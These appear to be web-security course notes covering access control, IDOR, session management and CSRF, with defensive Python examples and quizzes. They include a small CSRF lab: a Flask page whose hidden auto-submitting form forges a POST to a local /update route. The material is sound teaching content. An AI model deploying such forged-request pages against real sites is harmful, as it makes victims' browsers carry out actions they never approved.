## CIA

### Confidentiality:
Only those authorized can access info.  
#### Vulnerabilities
Unauthorized access to sensitive info (identity theft, financial fraud, or loss of competitive advantage)

---

### Integrity:
Accuracy and completeness of info.  
#### Vulnerabilities
An attacker could cause incorrect info to be displayed/processed, leading to incorrect decision-making, fraud, etc.

---


### Availability:
Authorized users have timely and reliable access to resources.  
#### Vulnerabilities
Exploits could disrupt services, resulting in loss of productivity, revenue, etc.


---

## Broken Access Control
Access controls are responsible for determining which users are allowed to access, modify, or delete specific resources within a system. Access control enforces that users cannot act outside of their intended permissions.  

#### Common access control vulnerabilities:

1. Violation of the principle of least privilege or deny by default.
2. Bypassing access control checks by modifying URL params, internal App state, the HTML page or API requests.
3. Insecure direct object references: permitting viewing or editing someone else's account.
4. Accessing API with missing access controls for POST, PUT and DELETE.
5. Elevation of privilege: acting as a user without being logged in, or as an admin without being one.
6. Metadata manipulation: JWTs, cookies, hidden fields.
7. CORS misconfiguration, allowing unauthorized/untrusted origins.
8. Force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.

---



## Insecure Direct Object Reference (IDOR)

A common security vulnerability that happens when an app exposes direct access to internal objects, such as files, database records, etc., without proper access control.  
Usually, this occurs when devs implement insufficient access controls on resources that are referenced by URL params, form fields or other user-controlled inputs.
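
The two sections above, as an added example (not code from the original notes): an IDOR-prone lookup that keys only on the id taken from the request, next to a deny-by-default version that checks ownership and role, plus an indirect-reference map that hands the client opaque per-user handles instead of raw ids. The `User`/`Order` types, the `ORDERS` table, the role names and the `Forbidden` error are all constructed for illustration.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional


@dataclass(frozen=True)
class User:
    username: str
    roles: FrozenSet[str]


@dataclass(frozen=True)
class Order:
    order_id: int
    owner: str
    total: float


class Forbidden(Exception):
    """Raised when the caller may not perform the action on the resource."""


# Constructed sample data standing in for a database table.
ORDERS: Dict[int, Order] = {
    1001: Order(1001, "alice", 42.00),
    1002: Order(1002, "bob", 199.99),
}


def get_order_vulnerable(order_id: int) -> Optional[Order]:
    """IDOR-prone: the id from the URL is the only key used, so any authenticated
    user who changes ?order_id=1001 to 1002 reads someone else's order."""
    return ORDERS.get(order_id)


def can_access(user: User, order: Order, action: str) -> bool:
    """Deny by default: only explicit owner or role grants return True."""
    if "admin" in user.roles:
        return action in {"read", "update", "delete"}
    if order.owner == user.username:
        return action in {"read", "update"}  # owners cannot delete
    return False


def get_order_secure(user: User, order_id: int, action: str = "read") -> Order:
    """Ownership-checked lookup. 'Missing' and 'not yours' raise the same error,
    so the id space cannot be mapped by comparing responses."""
    order = ORDERS.get(order_id)
    if order is None or not can_access(user, order, action):
        raise Forbidden(f"order {order_id}: access denied")
    return order


def is_allowed(user: User, order_id: int, action: str = "read") -> bool:
    """Boolean wrapper around get_order_secure."""
    try:
        get_order_secure(user, order_id, action)
        return True
    except Forbidden:
        return False


def make_reference_map(user: User) -> Dict[str, int]:
    """Indirect object references: the client gets opaque per-user handles
    instead of database ids; a handle outside this map resolves to nothing."""
    return {secrets.token_urlsafe(8): oid
            for oid, o in ORDERS.items() if o.owner == user.username}


def resolve_reference(refmap: Dict[str, int], handle: str) -> Optional[int]:
    """Translate a client handle back to a real id, or None if it is not the user's."""
    return refmap.get(handle)


if __name__ == "__main__":
    alice = User("alice", frozenset({"customer"}))
    print(get_order_vulnerable(1002))         # bob's order, no check at all
    print(is_allowed(alice, 1002))            # False
    print(is_allowed(alice, 1001, "update"))  # True
```

The point of `get_order_secure` is that the authorization decision lives next to the lookup and fails closed; the reference map goes one step further by never exposing a guessable id to the browser in the first place.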

---

## Insecure Session Management

A session is a temporary interaction between a user and a web application, established to maintain the user’s state and track their activities across multiple requests. These sessions are typically managed through the use of session tokens, which are unique identifiers assigned to each user during their interaction with the application.

Insecure Session Management can lead to unauthorized access, session hijacking, etc., compromising the CIA of user data and the app itself.

Some causes can be:

1. Weak session token generation.
2. Improper storage and transmission of session tokens.
3. Lack of session timeouts.
4. Ineffective session termination.


And some practices and guidelines to prevent ISM:

1. Use secure algorithms to generate session cookies.
2. Ensure the use of HTTPS.
3. Implement secure cookie attributes.
4. Regularly expire session tokens.

More info on sessions here: [Session Management Testing](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema)
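
The four practices above, as an added example (not code from the notes or the linked OWASP guide): a minimal server-side session store that generates tokens from the OS CSPRNG, stores only a hash of them, enforces idle and absolute timeouts, terminates and rotates sessions, and emits a cookie with the secure attributes. The class and function names, the timeout values and the injectable clock are assumptions made for this illustration.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 15 * 60        # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # hard lifetime regardless of activity


@dataclass
class Session:
    username: str
    created: float
    last_seen: float


class SessionStore:
    """Server-side store keyed by a hash of the token. The clock is injectable
    so expiry can be exercised without waiting."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def _key(token: str) -> str:
        # Only the hash is stored: a dumped store does not yield usable tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def create(self, username: str) -> str:
        # 32 bytes from the OS CSPRNG; never a counter, timestamp or uuid1.
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[self._key(token)] = Session(username, now, now)
        return token

    def lookup(self, token: str) -> Optional[str]:
        """Return the username for a live token, expiring it if a timeout passed."""
        s = self._sessions.get(self._key(token))
        if s is None:
            return None
        now = self._clock()
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT:
            self.destroy(token)
            return None
        s.last_seen = now
        return s.username

    def rotate(self, token: str) -> Optional[str]:
        """Issue a fresh token and kill the old one (after login or privilege change)."""
        user = self.lookup(token)
        if user is None:
            return None
        self.destroy(token)
        return self.create(user)

    def destroy(self, token: str) -> None:
        """Effective termination: logout removes the server-side record."""
        self._sessions.pop(self._key(token), None)

    def count(self) -> int:
        return len(self._sessions)


def session_cookie(token: str) -> str:
    """Set-Cookie value: Secure (HTTPS only), HttpOnly (no script access),
    SameSite=Strict (not attached to cross-site requests), bounded Max-Age."""
    return (f"sid={token}; Path=/; Max-Age={IDLE_TIMEOUT}; "
            "Secure; HttpOnly; SameSite=Strict")
```

Because the record is held server side, "logout" and "timeout" both mean the token stops resolving everywhere at once, which a client-side-only expiry cannot guarantee.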

Quiz:

- What is a session in the context of web application development?
  * A unique identifier used to track user state
- Which of the following is the primary purpose of session tokens?
  * Managing and tracking user activities across multiple requests
- Which security breach can result from Insecure Session Management?
  * Unauthorized access
- What is the main benefit of implementing secure cookie attributes in session management?
  * Protection against session hijacking

---


## Cross-Site Request Forgery (CSRF)
Enables an attacker to manipulate and execute unauthorized actions on behalf of an unsuspecting user. The attacker tricks the user into performing actions on a site they are already authenticated on, without them knowing/consenting.  

![Attack](https://d36ai2hkxl16us.cloudfront.net/course-uploads/e0df7fbf-a057-42af-8a1f-590912be5460/6fcr2jtrl9za-csrf1.png)

The attack is executed by exploiting the web application’s failure to properly validate the source of incoming requests. It typically involves crafting malicious links, embedding them in seemingly innocuous content such as emails or web pages, and then enticing the user to click on those links. When the user interacts with the malicious content, their browser inadvertently sends a request to the targeted web application, which then executes the unintended action.
The attack inherits the identity and privileges of the victim to perform the undesired action. For most sites, browser requests automatically include any credentials associated with the site (session cookies, IP address, etc).

CSRF attacks target functionality that causes a state change / data mutation, since the attacker doesn't receive the response; the victim does.
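
The server-side counterpart to the description above, as an added example (not code from the notes or the lab): the checks a state-changing endpoint such as the lab's `/update` route can apply so that a cross-site auto-submitted form is rejected. It combines a synchronizer token (random per session, compared in constant time) with an Origin/Referer source check, both failing closed. The `SITE_ORIGIN` value, the dict-shaped request and the function names are assumptions for this illustration.

```python
import hmac
import secrets
from typing import Dict, Mapping, Optional, Tuple
from urllib.parse import urlsplit

# Constructed origin of the protected application (an assumption for the example).
SITE_ORIGIN = "https://app.example"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Synchronizer token: one random secret per session, kept server side and
    echoed into each form as a hidden field."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def request_origin(headers: Mapping[str, str]) -> Optional[str]:
    """Origin header, falling back to the Referer's scheme://host; None if neither."""
    origin = headers.get("Origin")
    if origin:
        return origin
    referer = headers.get("Referer")
    if referer:
        p = urlsplit(referer)
        if p.scheme and p.netloc:
            return f"{p.scheme}://{p.netloc}"
    return None


def csrf_ok(session: Mapping[str, str], headers: Mapping[str, str],
            form: Mapping[str, str]) -> bool:
    """Both layers must pass: token match (constant time) and same-origin source.
    A missing token or missing origin fails closed."""
    expected, supplied = session.get("csrf"), form.get("csrf_token")
    if not expected or not supplied:
        return False
    if not hmac.compare_digest(expected, supplied):
        return False
    return request_origin(headers) == SITE_ORIGIN


def handle_update(session: Dict[str, str], headers: Mapping[str, str],
                  form: Mapping[str, str]) -> Tuple[int, str]:
    """Toy version of a state-changing /update endpoint: the mutation only
    happens after csrf_ok has passed."""
    if not csrf_ok(session, headers, form):
        return 403, "request rejected: CSRF check failed"
    session["color"] = form.get("color", "")
    return 200, f"color set to {session['color']}"


if __name__ == "__main__":
    sess: Dict[str, str] = {}
    tok = issue_csrf_token(sess)
    # Legitimate form from our own page carries the token and a same-site Origin.
    print(handle_update(sess, {"Origin": SITE_ORIGIN},
                        {"csrf_token": tok, "color": "blue"}))
    # A cross-site auto-submitted form has neither.
    print(handle_update(sess, {"Origin": "http://localhost:1337"},
                        {"color": "Hackzord!"}))
```

The token alone defeats the forged form because the attacker's page cannot read the victim's session value; the origin check is a second, independent layer, and a `SameSite` cookie attribute (see the quiz below) would stop the session cookie from being attached to the cross-site POST at all.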



## CSRF Lab

Run these commands in your terminal:

```bash
python3 -m venv .venv
source .venv/bin/activate
pip install flask
pip install requests
```

```python
# app.py -- serves the lab's attacker page (templates/evil.html) on port 1337

from flask import Flask, request, url_for, render_template, redirect, make_response
import requests

app = Flask(__name__, static_url_path='/static', static_folder='static')

app.config['DEBUG'] = True

@app.route("/")
def start():
    # Render the auto-submitting form that posts to the victim app's /update route
    return render_template("evil.html")

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=1337)
```
```html
<!-- templates/evil.html -->

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://0.0.0.0:5000/update' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='color' value='Hackzord!'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
```

Run the app with:

```bash
python app.py
```

Open a new browser tab => `http://localhost:1337/`

### CSRF Quiz:

* Which of the following actions could be performed by an attacker in a CSRF attack?
  - [x] Changing the victim’s account settings
  - [ ] Stealing the victim’s session cookie
  - [ ] Directly accessing the victim’s account data
  - [ ] Intercepting the victim’s network traffic
* What is a common method used by attackers to execute a CSRF attack?
  - [ ] Injecting malicious scripts into a web page
  - [ ] Exploiting server-side vulnerabilities
  - [x] Tricking the user into clicking a malicious link
  - [ ] Brute-forcing the user’s credentials
* Which of the following security measures can help prevent CSRF attacks?
  - [ ] Input validation
  - [x] Anti-CSRF tokens
  - [ ] Content Security Policy
  - [ ] Rate limiting
* What purpose does the SameSite attribute serve in relation to CSRF protection?
  - [x] It prevents cookies from being sent in cross-site requests
  - [ ] It encrypts cookies to protect them from theft
  - [ ] It sets a time limit for cookie expiration
  - [ ] It enforces strict transport security on cookies

---

## Cryptographic Failures:


